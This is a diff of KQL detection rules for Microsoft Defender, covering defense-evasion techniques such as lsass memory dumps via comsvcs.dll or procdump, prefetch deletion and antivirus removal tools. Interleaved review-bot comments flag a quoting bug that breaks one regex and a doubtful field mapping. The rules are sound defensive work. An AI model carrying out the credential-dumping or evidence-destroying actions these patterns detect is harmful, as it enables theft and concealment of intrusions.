-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-10-18
-// Level: high
-// Description: Detects PowerShell scripts to set the ACL to a file in the Windows folder
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion
-
-DeviceProcessEvents
+// Title: PowerShell Set-Acl On Windows Folder
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-10-18
+// Level: high
+// Description: Detects PowerShell scripts to set the ACL to a file in the Windows folder
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "Set-Acl " and ProcessCommandLine contains "-AclObject ") and ((ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")) or (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe")) and (ProcessCommandLine contains "-Path \"C:\\Windows" or ProcessCommandLine contains "-Path 'C:\\Windows" or ProcessCommandLine contains "-Path %windir%" or ProcessCommandLine contains "-Path $env:windir") and (ProcessCommandLine contains "FullControl" or ProcessCommandLine contains "Allow")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/powershell_token_obfuscation_process_creation.kql b/KQL/rules/Defense Evasion/powershell_token_obfuscation_process_creation.kql
index 8c648c23..7904ae91 100644
--- a/KQL/rules/Defense Evasion/powershell_token_obfuscation_process_creation.kql
+++ b/KQL/rules/Defense Evasion/powershell_token_obfuscation_process_creation.kql
@@ -1,10 +1,10 @@
-// Title: Powershell Token Obfuscation - Process Creation
-// Author: frack113
-// Date: 2022-12-27
-// Level: high
-// Description: Detects TOKEN OBFUSCATION technique from Invoke-Obfuscation
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1027.009
-
-DeviceProcessEvents
+// Title: Powershell Token Obfuscation - Process Creation
+// Author: frack113
+// Date: 2022-12-27
+// Level: high
+// Description: Detects TOKEN OBFUSCATION technique from Invoke-Obfuscation
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1027.009
+
+DeviceProcessEvents
 | where (ProcessCommandLine matches regex "\\w+`(\\w+|-|.)`[\\w+|\\s]" or ProcessCommandLine matches regex ""(\\{\\d\\})+"\\s*-f" or ProcessCommandLine matches regex "(?i)\\$\\{`?e`?n`?v`?:`?p`?a`?t`?h`?\\}") and (not(ProcessCommandLine contains "${env:path}"))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/prefetch_file_deleted.kql b/KQL/rules/Defense Evasion/prefetch_file_deleted.kql
index 0708ecd6..4cf0c433 100644
--- a/KQL/rules/Defense Evasion/prefetch_file_deleted.kql
+++ b/KQL/rules/Defense Evasion/prefetch_file_deleted.kql
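Review bot: The second pattern on the `| where` line, `ProcessCommandLine matches regex ""(\\{\\d\\})+"\\s*-f"`, embeds unescaped double quotes inside a double-quoted KQL string literal, so the literal terminates after `""` and the query fails to parse, taking the whole rule down with it. Escape the inner quotes or switch to a single-quoted verbatim literal, `ProcessCommandLine matches regex @'"(\{\d\})+"\s*-f'`. The first and third patterns contain no quotes and are unaffected, but they only take effect once the statement parses.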
@@ -1,10 +1,10 @@
-// Title: Prefetch File Deleted
-// Author: Cedric MAURUGEON
-// Date: 2021-09-29
-// Level: high
-// Description: Detects the deletion of a prefetch file which may indicate an attempt to destroy forensic evidence
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1070.004
-
-DeviceFileEvents
+// Title: Prefetch File Deleted
+// Author: Cedric MAURUGEON
+// Date: 2021-09-29
+// Level: high
+// Description: Detects the deletion of a prefetch file which may indicate an attempt to destroy forensic evidence
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1070.004
+
+DeviceFileEvents
 | where (FolderPath contains ":\\Windows\\Prefetch\\" and FolderPath endswith ".pf") and (not((InitiatingProcessFolderPath endswith ":\\windows\\system32\\svchost.exe" and (RequestAccountName contains "AUTHORI" or RequestAccountName contains "AUTORI"))))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/procdump_execution.kql b/KQL/rules/Defense Evasion/procdump_execution.kql
index 79edbce1..8ebc8682 100644
--- a/KQL/rules/Defense Evasion/procdump_execution.kql
+++ b/KQL/rules/Defense Evasion/procdump_execution.kql
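Review bot: The svchost exclusion on the `| where` line tests `RequestAccountName`, which in DeviceFileEvents I believe describes the account behind a remote (network share) request rather than the local process performing the action; for a local svchost deletion it would be empty, `contains` on it would be false, and the exclusion would never suppress anything. If the intent is the Sigma `User` field (`NT AUTHORITY\SYSTEM`), the closer mapping is the initiating-process account, and the `AUTHORI`/`AUTORI` substrings live in the domain part: `(InitiatingProcessAccountDomain contains "AUTHORI" or InitiatingProcessAccountDomain contains "AUTORI")`. Confirm against live events before changing, since field population differs between local and remote file activity.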
@@ -1,12 +1,12 @@
-// Title: Procdump Execution
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021-08-16
-// Level: medium
-// Description: Detects usage of the SysInternals Procdump utility
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1036, attack.t1003.001, attack.credential-access
-// False Positives:
-// - Legitimate use of procdump by a developer or administrator
-
-DeviceProcessEvents
+// Title: Procdump Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-08-16
+// Level: medium
+// Description: Detects usage of the SysInternals Procdump utility
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036, attack.t1003.001, attack.credential-access
+// False Positives:
+// - Legitimate use of procdump by a developer or administrator
+
+DeviceProcessEvents
 | where FolderPath endswith "\\procdump.exe" or FolderPath endswith "\\procdump64.exe"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/process_access_via_trolleyexpress_exclusion.kql b/KQL/rules/Defense Evasion/process_access_via_trolleyexpress_exclusion.kql
index efb0fafa..bfd8847d 100644
--- a/KQL/rules/Defense Evasion/process_access_via_trolleyexpress_exclusion.kql
+++ b/KQL/rules/Defense Evasion/process_access_via_trolleyexpress_exclusion.kql
@@ -1,10 +1,10 @@
-// Title: Process Access via TrolleyExpress Exclusion
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022-02-10
-// Level: high
-// Description: Detects a possible process memory dump that uses the white-listed Citrix TrolleyExpress.exe filename as a way to dump the lsass process memory
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1218.011, attack.credential-access, attack.t1003.001
-
-DeviceProcessEvents
+// Title: Process Access via TrolleyExpress Exclusion
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-02-10
+// Level: high
+// Description: Detects a possible process memory dump that uses the white-listed Citrix TrolleyExpress.exe filename as a way to dump the lsass process memory
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.011, attack.credential-access, attack.t1003.001
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "\\TrolleyExpress 7" or ProcessCommandLine contains "\\TrolleyExpress 8" or ProcessCommandLine contains "\\TrolleyExpress 9" or ProcessCommandLine contains "\\TrolleyExpress.exe 7" or ProcessCommandLine contains "\\TrolleyExpress.exe 8" or ProcessCommandLine contains "\\TrolleyExpress.exe 9" or ProcessCommandLine contains "\\TrolleyExpress.exe -ma ") or (FolderPath endswith "\\TrolleyExpress.exe" and (not((isnull(ProcessVersionInfoOriginalFileName) or ProcessVersionInfoOriginalFileName contains "CtxInstall"))))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/process_creation_using_sysnative_folder.kql b/KQL/rules/Defense Evasion/process_creation_using_sysnative_folder.kql
index 43b5b502..2991b840 100644
--- a/KQL/rules/Defense Evasion/process_creation_using_sysnative_folder.kql
+++ b/KQL/rules/Defense Evasion/process_creation_using_sysnative_folder.kql
@@ -1,10 +1,10 @@
-// Title: Process Creation Using Sysnative Folder
-// Author: Max Altgelt (Nextron Systems)
-// Date: 2022-08-23
-// Level: medium
-// Description: Detects process creation events that use the Sysnative folder (common for CobaltStrike spawns)
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1055
-
-DeviceProcessEvents
+// Title: Process Creation Using Sysnative Folder
+// Author: Max Altgelt (Nextron Systems)
+// Date: 2022-08-23
+// Level: medium
+// Description: Detects process creation events that use the Sysnative folder (common for CobaltStrike spawns)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1055
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains ":\\Windows\\Sysnative\\" or FolderPath contains ":\\Windows\\Sysnative\\") and (not((ProcessCommandLine contains "install" and (FolderPath contains "C:\\Windows\\Microsoft.NET\\Framework64\\v" or FolderPath contains "C:\\Windows\\Microsoft.NET\\Framework\\v" or FolderPath contains "C:\\Windows\\Microsoft.NET\\FrameworkArm\\v" or FolderPath contains "C:\\Windows\\Microsoft.NET\\FrameworkArm64\\v") and FolderPath endswith "\\ngen.exe"))) and (not((ProcessCommandLine contains "\"C:\\Windows\\sysnative\\cmd.exe\"" and ProcessCommandLine contains "\\xampp\\" and ProcessCommandLine contains "\\catalina_start.bat")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/process_execution_from_a_potentially_suspicious_folder.kql b/KQL/rules/Defense Evasion/process_execution_from_a_potentially_suspicious_folder.kql
index a7e38ca7..1832f3e8 100644
--- a/KQL/rules/Defense Evasion/process_execution_from_a_potentially_suspicious_folder.kql
+++ b/KQL/rules/Defense Evasion/process_execution_from_a_potentially_suspicious_folder.kql
@@ -1,10 +1,10 @@
-// Title: Process Execution From A Potentially Suspicious Folder
-// Author: Florian Roth (Nextron Systems), Tim Shelton
-// Date: 2019-01-16
-// Level: high
-// Description: Detects a potentially suspicious execution from an uncommon folder.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1036
-
-DeviceProcessEvents
+// Title: Process Execution From A Potentially Suspicious Folder
+// Author: Florian Roth (Nextron Systems), Tim Shelton
+// Date: 2019-01-16
+// Level: high
+// Description: Detects a potentially suspicious execution from an uncommon folder.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036
+
+DeviceProcessEvents
 | where (FolderPath contains ":\\Perflogs\\" or FolderPath contains ":\\Users\\All Users\\" or FolderPath contains ":\\Users\\Default\\" or FolderPath contains ":\\Users\\NetworkService\\" or FolderPath contains ":\\Windows\\addins\\" or FolderPath contains ":\\Windows\\debug\\" or FolderPath contains ":\\Windows\\Fonts\\" or FolderPath contains ":\\Windows\\Help\\" or FolderPath contains ":\\Windows\\IME\\" or FolderPath contains ":\\Windows\\Media\\" or FolderPath contains ":\\Windows\\repair\\" or FolderPath contains ":\\Windows\\security\\" or FolderPath contains ":\\Windows\\System32\\Tasks\\" or FolderPath contains ":\\Windows\\Tasks\\" or FolderPath contains "$Recycle.bin" or FolderPath contains "\\config\\systemprofile\\" or FolderPath contains "\\Intel\\Logs\\" or FolderPath contains "\\RSA\\MachineKeys\\") and (not(((FolderPath endswith "\\CitrixReceiverUpdater.exe" and FolderPath startswith "C:\\Windows\\SysWOW64\\config\\systemprofile\\Citrix\\UpdaterBinaries\\") or FolderPath startswith "C:\\Users\\Public\\IBM\\ClientSolutions\\Start_Programs\\")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/process_launched_without_image_name.kql b/KQL/rules/Defense Evasion/process_launched_without_image_name.kql
index 6cbdad72..25656e9f 100644
--- a/KQL/rules/Defense Evasion/process_launched_without_image_name.kql
+++ b/KQL/rules/Defense Evasion/process_launched_without_image_name.kql
@@ -1,12 +1,12 @@
-// Title: Process Launched Without Image Name
-// Author: Matt Anderson (Huntress)
-// Date: 2024-07-23
-// Level: medium
-// Description: Detect the use of processes with no name (".exe"), which can be used to evade Image-based detections.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion
-// False Positives:
-// - Rare legitimate software.
-
-DeviceProcessEvents
+// Title: Process Launched Without Image Name
+// Author: Matt Anderson (Huntress)
+// Date: 2024-07-23
+// Level: medium
+// Description: Detect the use of processes with no name (".exe"), which can be used to evade Image-based detections.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+// False Positives:
+// - Rare legitimate software.
+
+DeviceProcessEvents
 | where FolderPath endswith "\\.exe"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/process_memory_dump_via_comsvcs_dll.kql b/KQL/rules/Defense Evasion/process_memory_dump_via_comsvcs_dll.kql
index ff040eff..b9b7a90d 100644
--- a/KQL/rules/Defense Evasion/process_memory_dump_via_comsvcs_dll.kql
+++ b/KQL/rules/Defense Evasion/process_memory_dump_via_comsvcs_dll.kql
@@ -1,12 +1,12 @@
-// Title: Process Memory Dump Via Comsvcs.DLL
-// Author: Florian Roth (Nextron Systems), Modexp, Nasreddine Bencherchali (Nextron Systems), Swachchhanda Shrawan Poudel (Nextron Systems)
-// Date: 2020-02-18
-// Level: high
-// Description: Detects a process memory dump via "comsvcs.dll" using rundll32, covering multiple different techniques (ordinal, minidump function, etc.)
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.credential-access, attack.t1036, attack.t1003.001, car.2013-05-009
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: Process Memory Dump Via Comsvcs.DLL
+// Author: Florian Roth (Nextron Systems), Modexp, Nasreddine Bencherchali (Nextron Systems), Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2020-02-18
+// Level: high
+// Description: Detects a process memory dump via "comsvcs.dll" using rundll32, covering multiple different techniques (ordinal, minidump function, etc.)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.credential-access, attack.t1036, attack.t1003.001, car.2013-05-009
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where ((FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE" or ProcessCommandLine contains "rundll32") and ((ProcessCommandLine contains "#-" or ProcessCommandLine contains "#+" or ProcessCommandLine contains "#24" or ProcessCommandLine contains "24 " or ProcessCommandLine contains "MiniDump" or ProcessCommandLine contains "#65560") and (ProcessCommandLine contains "comsvcs" and ProcessCommandLine contains "full"))) or ((ProcessCommandLine contains " #" or ProcessCommandLine contains ",#" or ProcessCommandLine contains ", #" or ProcessCommandLine contains "\"#") and (ProcessCommandLine contains "24" and ProcessCommandLine contains "comsvcs" and ProcessCommandLine contains "full"))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/process_memory_dump_via_dotnet_dump.kql b/KQL/rules/Defense Evasion/process_memory_dump_via_dotnet_dump.kql
index dcd20223..8e9c3f19 100644
--- a/KQL/rules/Defense Evasion/process_memory_dump_via_dotnet_dump.kql
+++ b/KQL/rules/Defense Evasion/process_memory_dump_via_dotnet_dump.kql
@@ -1,12 +1,12 @@
-// Title: Process Memory Dump Via Dotnet-Dump
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-03-14
-// Level: medium
-// Description: Detects the execution of "dotnet-dump" with the "collect" flag. The execution could indicate potential process dumping of critical processes such as LSASS.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1218
-// False Positives:
-// - Process dumping is the expected behavior of the tool. So false positives are expected in legitimate usage. The PID/Process Name of the process being dumped needs to be investigated
-
-DeviceProcessEvents
+// Title: Process Memory Dump Via Dotnet-Dump
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-03-14
+// Level: medium
+// Description: Detects the execution of "dotnet-dump" with the "collect" flag. The execution could indicate potential process dumping of critical processes such as LSASS.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+// False Positives:
+// - Process dumping is the expected behavior of the tool. So false positives are expected in legitimate usage. The PID/Process Name of the process being dumped needs to be investigated
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "collect" and (FolderPath endswith "\\dotnet-dump.exe" or ProcessVersionInfoOriginalFileName =~ "dotnet-dump.dll")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/process_proxy_execution_via_squirrel_exe.kql b/KQL/rules/Defense Evasion/process_proxy_execution_via_squirrel_exe.kql
index a7d5dc12..272776a6 100644
--- a/KQL/rules/Defense Evasion/process_proxy_execution_via_squirrel_exe.kql
+++ b/KQL/rules/Defense Evasion/process_proxy_execution_via_squirrel_exe.kql
@@ -1,12 +1,12 @@
-// Title: Process Proxy Execution Via Squirrel.EXE
-// Author: Nasreddine Bencherchali (Nextron Systems), Karneades / Markus Neis, Jonhnathan Ribeiro, oscd.community
-// Date: 2022-06-09
-// Level: medium
-// Description: Detects the usage of the "Squirrel.exe" binary to execute arbitrary processes. This binary is part of multiple Electron based software installations (Slack, Teams, Discord, etc.)
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.execution, attack.t1218
-// False Positives:
-// - Expected FP with some Electron based applications such as (1Clipboard, Beaker Browser, Caret, Discord, GitHub Desktop, etc.)
-
-DeviceProcessEvents
+// Title: Process Proxy Execution Via Squirrel.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems), Karneades / Markus Neis, Jonhnathan Ribeiro, oscd.community
+// Date: 2022-06-09
+// Level: medium
+// Description: Detects the usage of the "Squirrel.exe" binary to execute arbitrary processes. This binary is part of multiple Electron based software installations (Slack, Teams, Discord, etc.)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.t1218
+// False Positives:
+// - Expected FP with some Electron based applications such as (1Clipboard, Beaker Browser, Caret, Discord, GitHub Desktop, etc.)
+
+DeviceProcessEvents
 | where ((ProcessCommandLine contains "--processStart" or ProcessCommandLine contains "--processStartAndWait" or ProcessCommandLine contains "--createShortcut") and (FolderPath endswith "\\squirrel.exe" or FolderPath endswith "\\update.exe")) and (not((((ProcessCommandLine contains "--createShortcut" or ProcessCommandLine contains "--processStart") and (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\AppData\\Local\\Discord\\Update.exe" and ProcessCommandLine contains "Discord.exe")) or ((ProcessCommandLine contains "--createShortcut" or ProcessCommandLine contains "--processStartAndWait") and (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\AppData\\Local\\GitHubDesktop\\Update.exe" and ProcessCommandLine contains "GitHubDesktop.exe")) or ((ProcessCommandLine contains "--processStart" or ProcessCommandLine contains "--createShortcut") and (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\AppData\\Local\\Microsoft\\Teams\\Update.exe" and ProcessCommandLine contains "Teams.exe")) or ((ProcessCommandLine contains "--processStart" or ProcessCommandLine contains "--createShortcut") and (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\AppData\\Local\\yammerdesktop\\Update.exe" and ProcessCommandLine contains "Yammer.exe")))))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/proxy_execution_via_vshadow.kql b/KQL/rules/Defense Evasion/proxy_execution_via_vshadow.kql
index bc1d55df..4623d3d3 100644
--- a/KQL/rules/Defense Evasion/proxy_execution_via_vshadow.kql
+++ b/KQL/rules/Defense Evasion/proxy_execution_via_vshadow.kql
@@ -1,15 +1,15 @@
-// Title: Proxy Execution via Vshadow
-// Author: David Faiss
-// Date: 2025-05-26
-// Level: medium
-// Description: Detects the invocation of vshadow.exe with the -exec parameter that executes a specified script or command after the shadow copies are created but before the VShadow tool exits.
-// VShadow is a command-line tool that you can use to create and manage volume shadow copies. While legitimate backup or administrative scripts may use this flag,
-// attackers can leverage this parameter to proxy the execution of malware.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1202
-// False Positives:
-// - System backup or administrator tools
-// - Legitimate administrative scripts
-
-DeviceProcessEvents
+// Title: Proxy Execution via Vshadow
+// Author: David Faiss
+// Date: 2025-05-26
+// Level: medium
+// Description: Detects the invocation of vshadow.exe with the -exec parameter that executes a specified script or command after the shadow copies are created but before the VShadow tool exits.
+// VShadow is a command-line tool that you can use to create and manage volume shadow copies. While legitimate backup or administrative scripts may use this flag,
+// attackers can leverage this parameter to proxy the execution of malware.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1202
+// False Positives:
+// - System backup or administrator tools
+// - Legitimate administrative scripts
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "-exec" and (FolderPath endswith "\\vshadow.exe" or ProcessVersionInfoOriginalFileName =~ "vshadow.exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/proxy_execution_via_wuauclt_exe.kql b/KQL/rules/Defense Evasion/proxy_execution_via_wuauclt_exe.kql
index 14cef805..91353a20 100644
--- a/KQL/rules/Defense Evasion/proxy_execution_via_wuauclt_exe.kql
+++ b/KQL/rules/Defense Evasion/proxy_execution_via_wuauclt_exe.kql
@@ -1,10 +1,10 @@
-// Title: Proxy Execution Via Wuauclt.EXE
-// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), Florian Roth (Nextron Systems), Sreeman, FPT.EagleEye Team
-// Date: 2020-10-12
-// Level: high
-// Description: Detects the use of the Windows Update Client binary (wuauclt.exe) for proxy execution.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1218, attack.execution
-
-DeviceProcessEvents
+// Title: Proxy Execution Via Wuauclt.EXE
+// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), Florian Roth (Nextron Systems), Sreeman, FPT.EagleEye Team
+// Date: 2020-10-12
+// Level: high
+// Description: Detects the use of the Windows Update Client binary (wuauclt.exe) for proxy execution.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218, attack.execution
+
+DeviceProcessEvents
 | where ((ProcessCommandLine contains "UpdateDeploymentProvider" and ProcessCommandLine contains "RunHandlerComServer") and (FolderPath endswith "\\wuauclt.exe" or ProcessVersionInfoOriginalFileName =~ "wuauclt.exe")) and (not((ProcessCommandLine contains " /UpdateDeploymentProvider UpdateDeploymentProvider.dll " or (ProcessCommandLine contains ":\\Windows\\UUS\\Packages\\Preview\\amd64\\updatedeploy.dll /ClassId" or ProcessCommandLine contains ":\\Windows\\UUS\\amd64\\UpdateDeploy.dll /ClassId") or (ProcessCommandLine contains ":\\Windows\\WinSxS\\" and ProcessCommandLine contains "\\UpdateDeploy.dll /ClassId ") or ProcessCommandLine contains " wuaueng.dll ")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/psscriptpolicytest_creation_by_uncommon_process.kql b/KQL/rules/Defense Evasion/psscriptpolicytest_creation_by_uncommon_process.kql
index 83d5c4da..57a5d22c 100644
--- a/KQL/rules/Defense Evasion/psscriptpolicytest_creation_by_uncommon_process.kql
+++ b/KQL/rules/Defense Evasion/psscriptpolicytest_creation_by_uncommon_process.kql
@@ -1,10 +1,10 @@
-// Title: PSScriptPolicyTest Creation By Uncommon Process
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-06-01
-// Level: medium
-// Description: Detects the creation of the "PSScriptPolicyTest" PowerShell script by an uncommon process. This file is usually generated by Microsoft Powershell to test against Applocker.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion
-
-DeviceFileEvents
+// Title: PSScriptPolicyTest Creation By Uncommon Process
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-06-01
+// Level: medium
+// Description: Detects the creation of the "PSScriptPolicyTest" PowerShell script by an uncommon process. This file is usually generated by Microsoft Powershell to test against Applocker.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+
+DeviceFileEvents
 | where FolderPath contains "__PSScriptPolicyTest_" and (not(((InitiatingProcessFolderPath in~ ("C:\\Windows\\System32\\dsac.exe", "C:\\Windows\\System32\\sdiagnhost.exe", "C:\\Windows\\System32\\ServerManager.exe", "C:\\Windows\\System32\\wsmprovhost.exe", "C:\\Windows\\SysWOW64\\sdiagnhost.exe")) or (InitiatingProcessFolderPath in~ ("C:\\Program Files\\PowerShell\\7-preview\\pwsh.exe", "C:\\Program Files\\PowerShell\\7\\pwsh.exe", "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell_ise.exe", "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell_ise.exe", "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe")) or ((InitiatingProcessFolderPath contains "C:\\Program Files\\WindowsApps\\Microsoft.PowerShellPreview" or InitiatingProcessFolderPath contains "\\AppData\\Local\\Microsoft\\WindowsApps\\Microsoft.PowerShellPreview") and InitiatingProcessFolderPath endswith "\\pwsh.exe"))))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/pua_advancedrun_suspicious_execution.kql b/KQL/rules/Defense Evasion/pua_advancedrun_suspicious_execution.kql
index 96c32fb2..f40389f8 100644
--- a/KQL/rules/Defense Evasion/pua_advancedrun_suspicious_execution.kql
+++ b/KQL/rules/Defense Evasion/pua_advancedrun_suspicious_execution.kql
@@ -1,10 +1,10 @@
-// Title: PUA - AdvancedRun Suspicious Execution
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022-01-20
-// Level: high
-// Description: Detects the execution of AdvancedRun utility in the context of the TrustedInstaller, SYSTEM, Local Service or Network Service accounts
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1134.002
-
-DeviceProcessEvents
+// Title: PUA - AdvancedRun Suspicious Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-01-20
+// Level: high
+// Description: Detects the execution of AdvancedRun utility in the context of the TrustedInstaller, SYSTEM, Local Service or Network Service accounts
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1134.002
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "/EXEFilename" or ProcessCommandLine contains "/CommandLine") and ((ProcessCommandLine contains " /RunAs 8 " or ProcessCommandLine contains " /RunAs 4 " or ProcessCommandLine contains " /RunAs 10 " or ProcessCommandLine contains " /RunAs 11 ") or (ProcessCommandLine endswith "/RunAs 8" or ProcessCommandLine endswith "/RunAs 4" or ProcessCommandLine endswith "/RunAs 10" or ProcessCommandLine endswith "/RunAs 11"))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/pua_cleanwipe_execution.kql b/KQL/rules/Defense Evasion/pua_cleanwipe_execution.kql
index bfa23331..30b17c8e 100644
--- a/KQL/rules/Defense Evasion/pua_cleanwipe_execution.kql
+++ b/KQL/rules/Defense Evasion/pua_cleanwipe_execution.kql
@@ -1,12 +1,12 @@
-// Title: PUA - CleanWipe Execution
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2021-12-18
-// Level: high
-// Description: Detects the use of CleanWipe a tool usually used to delete Symantec antivirus.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1562.001
-// False Positives:
-// - Legitimate administrative use (Should be investigated either way)
-
-DeviceProcessEvents
+// Title: PUA - CleanWipe Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2021-12-18
+// Level: high
+// Description: Detects the use of CleanWipe a tool usually used to delete Symantec antivirus.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+// False Positives:
+// - Legitimate administrative use (Should be investigated either way)
+
+DeviceProcessEvents
 | where FolderPath endswith "\\SepRemovalToolNative_x64.exe" or (ProcessCommandLine contains "--uninstall" and FolderPath endswith "\\CATClean.exe") or (ProcessCommandLine contains "-r" and FolderPath endswith "\\NetInstaller.exe") or ((ProcessCommandLine contains "/uninstall" and ProcessCommandLine contains "/enterprise") and FolderPath endswith "\\WFPUnins.exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/pua_defendercheck_execution.kql b/KQL/rules/Defense Evasion/pua_defendercheck_execution.kql
index df5cb69e..2cccb8ec 100644
--- a/KQL/rules/Defense Evasion/pua_defendercheck_execution.kql
+++ b/KQL/rules/Defense Evasion/pua_defendercheck_execution.kql
@@ -1,12 +1,12 @@
-// Title: PUA - DefenderCheck Execution
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022-08-30
-// Level: high
-// Description: Detects the use of DefenderCheck, a tool to evaluate the signatures used in Microsoft Defender. It can be used to figure out the strings / byte chains used in Microsoft Defender to detect a tool and thus used for AV evasion.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1027.005
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: PUA - DefenderCheck Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-08-30
+// Level: high
+// Description: Detects the use of DefenderCheck, a tool to evaluate the signatures used in Microsoft Defender. It can be used to figure out the strings / byte chains used in Microsoft Defender to detect a tool and thus used for AV evasion.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1027.005
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where FolderPath endswith "\\DefenderCheck.exe" or ProcessVersionInfoFileDescription =~ "DefenderCheck"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/pua_potential_pe_metadata_tamper_using_rcedit.kql b/KQL/rules/Defense Evasion/pua_potential_pe_metadata_tamper_using_rcedit.kql
index 185532c8..150e4d9e 100644
--- a/KQL/rules/Defense Evasion/pua_potential_pe_metadata_tamper_using_rcedit.kql
+++ b/KQL/rules/Defense Evasion/pua_potential_pe_metadata_tamper_using_rcedit.kql
@@ -1,12 +1,12 @@
-// Title: PUA - Potential PE Metadata Tamper Using Rcedit
-// Author: Micah Babinski
-// Date: 2022-12-11
-// Level: medium
-// Description: Detects the use of rcedit to potentially alter executable PE metadata properties, which could conceal efforts to rename system utilities for defense evasion.
-// MITRE Tactic: Defense Evasion
